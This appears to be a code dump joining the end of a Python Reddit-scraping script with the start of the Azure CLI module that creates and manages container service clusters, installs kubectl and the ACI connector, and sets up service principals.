element=element+div.find('div',{'class':'entry unvoted'}).p.a.string+'\n' element=element+div.find('div',{'class':'entry unvoted'}).p.a['href']+'\n' if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'})!=None and div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time != None): element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['datetime']+'\t' element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['title']+'\t' element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time.string+'\n' if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a!=None): element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a.string+'\n' element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).text+'\n' if(div.p.next_sibling.next_sibling.find('div',{'class':'score likes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'})!=None): element=element+'score likes '+div.p.next_sibling.next_sibling.find('div',{'class':'score likes'}).string+'\t\t' element=element+'score dislikes '+div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'}).string+'\t\t' element=element+'score unvoted '+div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'}).string+'\n' f.write(element) c=c+1 except: continue def count_next_of_current(s,m): soup=make_soup(s) y='https://www.reddit.com/r/'+m+'/'+select_tab+'/?count=' match=re.compile(y) for link in soup.find_all('a',{'rel':['next']}): href=link['href'] return href def read_reddit_images(change_file_number,m,x): global f global select_tab select_tab=x x=m+'_'+select_tab+'.txt' #test_internet() s='https://www.reddit.com/r/'+m+'/'+select_tab soup=make_soup(s) f=open(x,'a',encoding='utf-8') f.write('\n\n\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n') maximum_number_of_next_pages=7 parse1(s) count=0 print('for '+m+' '+select_tab+' current page number is'+'\n'+str(count)) while(count<maximum_number_of_next_pages): s=count_next_of_current(s,m) if(s!=None): parse1(s) count=count+1 print(count) else: break f.write('\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n') f.close() def main(m,i): read_reddit_images(i,m,'new') read_reddit_images(i,m,'hot') read_reddit_images(i,m,'top') read_reddit_images(i,m,'rising') read_reddit_images(i,m,'controversial') read_reddit_images(i,m,'gilded') if __name__ == "__main__": processes = [] arguments = sys.argv[2:]#it was b for x in arguments: print(x) p = multiprocessing.Process(target=main, args=(str(x),int(sys.argv[1]), )) p.start() processes.append(p) for p in processes: p.join() my.close()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from msrestazure.azure_exceptions import CloudError import requests from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.graphrbac.models import (ApplicationCreateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters) from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes from azure.mgmt.containerservice.models import ManagedCluster from azure.mgmt.containerservice.models import ManagedClusterAADProfile from azure.mgmt.containerservice.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources logger = get_logger(__name__) # pylint:disable=too-many-lines,unused-argument def which(binary): path_var = os.getenv('PATH') if platform.system() == 'Windows': binary = binary + '.exe' parts = path_var.split(';') else: parts = path_var.split(':') for part in parts: bin_path = os.path.join(part, binary) if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK): return bin_path return None def wait_then_open(url): """ Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL. """ for _ in range(1, 10): try: urlopen(url, context=_ssl_context()) except URLError: time.sleep(1) break webbrowser.open_new_tab(url) def wait_then_open_async(url): """ Spawns a thread that waits for a bit then opens a URL. """ t = threading.Thread(target=wait_then_open, args=({url})) t.daemon = True t.start() def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None): """ Opens a browser to the web interface for the cluster orchestrator :param name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file) def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file): orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member if str(orchestrator_type).lower() == 'kubernetes' or \ orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \ (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file) elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos: return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) else: raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type)) def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Launch a proxy and browse the Kubernetes web UI. :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file) def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml') if os.path.exists(browse_path): os.remove(browse_path) _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False) logger.warning('Proxy running on 127.0.0.1:8001/ui') logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1:8001/ui') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"]) def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser. :param name: name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: Path to the SSH key to use :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file): if not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) acs = acs_client.ACSClient() if not acs.connect(_get_host_name(acs_info), _get_username(acs_info), key_filename=ssh_key_file): raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info))) octarine_bin = '/opt/mesosphere/bin/octarine' if not acs.file_exists(octarine_bin): raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin)) proxy_id = _rand_str(16) proxy_cmd = '{} {}'.format(octarine_bin, proxy_id) acs.run(proxy_cmd, background=True) # Parse the output to get the remote PORT proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id) stdout, _ = acs.run(proxy_client_cmd) remote_port = int(stdout.read().decode().strip()) local_port = acs.get_available_local_port() # Set the proxy proxy.set_http_proxy('127.0.0.1', local_port) logger.warning('Proxy running on 127.0.0.1:%s', local_port) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1') try: acs.create_tunnel( remote_host='127.0.0.1', remote_port=remote_port, local_port=local_port) finally: proxy.disable_http_proxy() return def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None): acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member kwargs = {'install_location': install_location} if client_version: kwargs['client_version'] = client_version if orchestrator_type == 'kubernetes': return k8s_install_cli(**kwargs) elif orchestrator_type == 'dcos': return dcos_install_cli(**kwargs) else: raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type)) def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _urlretrieve(url, filename): req = urlopen(url, context=_ssl_context()) with open(filename, "wb") as f: f.write(req.read()) def dcos_install_cli(cmd, install_location=None, client_version='1.8'): """ Downloads the dcos command line from Mesosphere """ system = platform.system() if not install_location: raise CLIError( "No install location specified and it could not be determined from the current platform '{}'".format( system)) base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}' if system == 'Windows': file_url = base_url.format('windows', client_version, 'dcos.exe') elif system == 'Linux': # TODO Support ARM CPU here file_url = base_url.format('linux', client_version, 'dcos') elif system == 'Darwin': file_url = base_url.format('darwin', client_version, 'dcos') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to %s', install_location) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as err: raise CLIError('Connection error while attempting to download client ({})'.format(err)) def k8s_install_cli(cmd, client_version='latest', install_location=None): """Install kubectl, a command-line interface for Kubernetes clusters.""" if client_version == 'latest': context = _ssl_context() version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt', context=context).read() client_version = version.decode('UTF-8').strip() else: client_version = "v%s" % client_version file_url = '' system = platform.system() base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}' # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) if system == 'Windows': file_url = base_url.format(client_version, 'windows', 'kubectl.exe') elif system == 'Linux': # TODO: Support ARM CPU here file_url = base_url.format(client_version, 'linux', 'kubectl') elif system == 'Darwin': file_url = base_url.format(client_version, 'darwin', 'kubectl') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to "%s" from "%s"', install_location, file_url) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group): from subprocess import PIPE, Popen instance = client.get(resource_group_name, name) helm_not_installed = 'Helm not detected, please verify if it is installed.' url_chart = chart_url if image_tag is None: image_tag = 'latest' # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # If SPN is specified, the secret should also be specified if service_principal is not None and client_secret is None: raise CLIError('--client-secret must be specified when --service-principal is specified') # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() # Validate the location upon the ACI avaiable regions _validate_aci_location(norm_location) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) subscription_id = _get_subscription_id(cmd.cli_ctx) # Get the TenantID profile = Profile(cli_ctx=cmd.cli_ctx) _, _, tenant_id = profile.get_login_credentials() # Check if we want the linux connector if os_type.lower() in ['linux', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Linux', instance.enable_rbac, instance.fqdn) # Check if we want the windows connector if os_type.lower() in ['windows', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Windows', instance.enable_rbac, instance.fqdn) def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, os_type, use_rbac, masterFqdn): rbac_install = "true" if use_rbac else "false" node_taint = 'azure.com/aci' helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name k8s_master = 'https://{}'.format(masterFqdn) logger.warning("Deploying the ACI connector for '%s' using Helm", os_type) try: values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format( node_name, node_taint, os_type, image_tag, rbac_install) if service_principal: values += ",env.azureClientId=" + service_principal if client_secret: values += ",env.azureClientKey=" + client_secret if subscription_id: values += ",env.azureSubscriptionId=" + subscription_id if tenant_id: values += ",env.azureTenantId=" + tenant_id if aci_resource_group: values += ",env.aciResourceGroup=" + aci_resource_group if norm_location: values += ",env.aciRegion=" + norm_location # Currently, we need to set the master FQDN. # This is temporary and we should remove it when possible values += ",env.masterUri=" + k8s_master if helm_cmd == "install": subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values]) elif helm_cmd == "upgrade": subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values]) except subprocess.CalledProcessError as err: raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err)) def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, graceful=False, os_type='Linux'): from subprocess import PIPE, Popen helm_not_installed = "Error : Helm not detected, please verify if it is installed." # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() if os_type.lower() in ['linux', 'both']: helm_release_name = connector_name.lower() + '-linux-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) if os_type.lower() in ['windows', 'both']: helm_release_name = connector_name.lower() + '-windows-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) def _undeploy_connector(graceful, node_name, helm_release_name): if graceful: logger.warning('Graceful option selected, will try to drain the node first') from subprocess import PIPE, Popen kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.' try: Popen(["kubectl"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(kubectl_not_installed) try: drain_node = subprocess.check_output( ['kubectl', 'drain', node_name, '--force', '--delete-local-data'], universal_newlines=True) if not drain_node: raise CLIError('Could not find the node, make sure you' + ' are using the correct --os-type') except subprocess.CalledProcessError as err: raise CLIError('Could not find the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) logger.warning("Undeploying the '%s' using Helm", helm_release_name) try: subprocess.call(['helm', 'del', helm_release_name, '--purge']) except subprocess.CalledProcessError as err: raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err)) try: subprocess.check_output( ['kubectl', 'delete', 'node', node_name], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not delete the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. except Exception as ex: # pylint: disable=broad-except logger.info(ex) time.sleep(2 + 2 * x) else: return False hook.add(message='Finished service principal creation', value=1.0, total_val=1.0) logger.info('Finished service principal creation') return service_principal def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0) logger.info('Waiting for AAD role to propagate') for x in range(0, 10): hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0) try: # TODO: break this out into a shared utility library create_role_assignment(cli_ctx, role, service_principal, scope=scope) break except CloudError as ex: if ex.message == 'The role assignment already exists.': break logger.info(ex.message) except: # pylint: disable=bare-except pass time.sleep(delay + delay * x) else: return False hook.add(message='AAD role propagation done', value=1.0, total_val=1.0) logger.info('AAD role propagation done') return True def _get_subscription_id(cli_ctx): _, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None) return sub_id def _get_default_dns_prefix(name, resource_group_name, subscription_id): # Use subscription id to provide uniqueness and prevent DNS name clashes name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10] if not name_part[0].isalpha(): name_part = (str('a') + name_part)[0:10] resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16] return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6]) def list_acs_locations(cmd, client): return { "productionRegions": regions_in_prod, "previewRegions": regions_in_preview } def _generate_windows_profile(windows, admin_username, admin_password): if windows: if not admin_password: raise CLIError('--admin-password is required.') if len(admin_password) < 6: raise CLIError('--admin-password must be at least 6 characters') windows_profile = { "adminUsername": admin_username, "adminPassword": admin_password, } return windows_profile return None def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile): master_pool_profile = {} default_master_pool_profile = { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', } if api_version == "2017-07-01": default_master_pool_profile = _update_dict(default_master_pool_profile, { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', "vmSize": master_vm_size, "osDiskSizeGB": int(master_osdisk_size), "vnetSubnetID": master_vnet_subnet_id, "firstConsecutiveStaticIP": master_first_consecutive_static_ip, "storageProfile": master_storage_profile, }) if not master_profile: master_pool_profile = default_master_pool_profile else: master_pool_profile = _update_dict(default_master_pool_profile, master_profile) return master_pool_profile def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile): agent_pool_profiles = [] default_agent_pool_profile = { "count": int(agent_count), "vmSize": agent_vm_size, "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', } if api_version == "2017-07-01": default_agent_pool_profile = _update_dict(default_agent_pool_profile, { "count": int(agent_count), "vmSize": agent_vm_size, "osDiskSizeGB": int(agent_osdisk_size), "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', "vnetSubnetID": agent_vnet_subnet_id, "ports": agent_ports, "storageProfile": agent_storage_profile, }) if agent_profiles is None: agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"})) else: # override agentPoolProfiles by using the passed in agent_profiles for idx, ap in enumerate(agent_profiles): # if the user specified dnsPrefix, we honor that # otherwise, we use the idx to avoid duplicate dns name a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap) agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a)) return agent_pool_profiles def _generate_outputs(name, orchestrator_type, admin_username): # define outputs outputs = { "masterFQDN": { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long }, "sshMaster0": { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long }, } if orchestrator_type.lower() != "kubernetes": outputs["agentFQDN"] = { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long } # override sshMaster0 for non-kubernetes scenarios outputs["sshMaster0"] = { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long } return outputs def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile): properties = { "orchestratorProfile": { "orchestratorType": orchestrator_type, }, "masterProfile": master_pool_profile, "agentPoolProfiles": agent_pool_profiles, "linuxProfile": { "ssh": { "publicKeys": [ { "keyData": ssh_key_value } ] }, "adminUsername": admin_username }, } if api_version == "2017-07-01": properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version if windows_profile is not None: properties["windowsProfile"] = windows_profile return properties # pylint: disable=too-many-locals def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None, location=None, admin_username="azureuser", api_version=None, master_profile=None, master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="", master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="", agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0, agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="", orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None, windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument validate=False, no_wait=False): """Create a new Acs. :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param deployment_name: The name of the deployment. :type deployment_name: str :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of the domain name and the regionalized DNS zone make up the fully qualified domain name associated with the public IP address. :type dns_name_prefix: str :param name: Resource name for the container service. :type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. :type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, "location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name, template, params, validate, no_wait) except CloudError as ex: retry_exception = ex if 'is not valid according to the validation procedure' in ex.message or \ 'The credentials in ServicePrincipalProfile were invalid' in ex.message or \ 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def store_acs_service_principal(subscription_id, client_secret, service_principal, file_name='acsServicePrincipal.json'): obj = {} if client_secret: obj['client_secret'] = client_secret if service_principal: obj['service_principal'] = service_principal config_path = os.path.join(get_config_dir(), file_name) full_config = load_service_principals(config_path=config_path) if not full_config: 